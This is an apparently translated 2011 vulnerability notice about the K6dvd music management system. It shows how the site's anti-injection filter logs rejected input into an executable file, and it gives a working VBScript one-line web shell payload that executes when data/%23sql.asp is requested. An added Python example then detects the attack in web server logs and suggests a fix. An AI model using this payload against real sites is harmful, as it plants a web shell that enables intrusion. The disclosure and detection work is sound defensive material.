K6dvd music network 0day (bypass anti-injection) - vulnerability warning - the black bar safety net

2011-04-20T00:00:00
ID MYHACK58:62201130129
Type myhack58
Reporter Anonymous
Modified 2011-04-20T00:00:00

Description

K6dvd music network 0day

The K6dvd television system is a well-regarded domestic music management system.

Find any URL that takes a parameter and submit a single quote (') in it; the site returns the following:

That is the anti-injection system. Most people who do penetration testing will have seen it.

Illegal operation! The system made the following record↓
Operation IP: xxx.xxx.xxx.xx
Operation time: 2009-5-28 19:33:47
Operation page: /yxplay.asp
Submit method: GET
Submitted parameter: id
Submitted data: 109446'

To use it, append this after any URL parameter: and =><script runat=server language=vbscript>eval request(chr(35))</script>

Then access data/%23sql.asp, where the one-line trojan (a one-sentence web shell) is executed.

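For defenders, the two steps above leave a recognisable trail in the web server log: a parameter carrying server-side script markup, followed by a direct request for the filter's own record file. The following is an added detection example, not code from the original advisory or from K6dvd. It assumes, as the steps imply, that the anti-injection filter stores rejected input in data/#sql.asp; the log layout, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified IIS W3C layout (an assumption):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2011-04-20 10:01:02 198.51.100.7 GET /yxplay.asp id=109446 200
2011-04-20 10:01:09 203.0.113.5 GET /yxplay.asp id=109446' 200
2011-04-20 10:02:30 203.0.113.5 GET /yxplay.asp id=1%3Cscript%20runat%3Dserver%20language%3Dvbscript%3Ex%3C/script%3E 200
2011-04-20 10:02:41 203.0.113.5 GET /data/%23sql.asp - 200
2011-04-20 10:05:00 198.51.100.7 GET /index.asp - 200
"""

# Markup that classic ASP would treat as server-side code if it reached an .asp file.
SERVER_SCRIPT = re.compile(r"<\s*script[^>]*runat\s*=\s*[\"']?server|<%", re.I)
FILTER_LOG = "/data/#sql.asp"  # decoded form of data/%23sql.asp named in the advisory


def decode(value):
    """Percent-decode a bounded number of times so double-encoded input is still seen."""
    for _ in range(3):
        nxt = unquote(value.replace("+", " "))
        if nxt == value:
            break
        value = nxt
    return value


def analyse(log_text):
    """Return (findings, confirmed): confirmed IPs planted script, then fetched the log."""
    findings, planted, confirmed = [], set(), set()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip header or malformed lines
        _, _, ip, _, stem, query, _ = parts
        if SERVER_SCRIPT.search(decode(query)):
            findings.append((ip, "server-side script in parameter", stem))
            planted.add(ip)
        if decode(stem).lower() == FILTER_LOG:
            findings.append((ip, "direct request for filter log", stem))
            if ip in planted:
                confirmed.add(ip)
    return findings, confirmed


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG)[0]:
        print(finding)
```

No ordinary visitor has a reason to request the filter's record file, so a hit on it is worth an alert on its own. The underlying fix is to keep such records out of any file the server will execute, for example a non-script file outside the web root, with the logged input encoded.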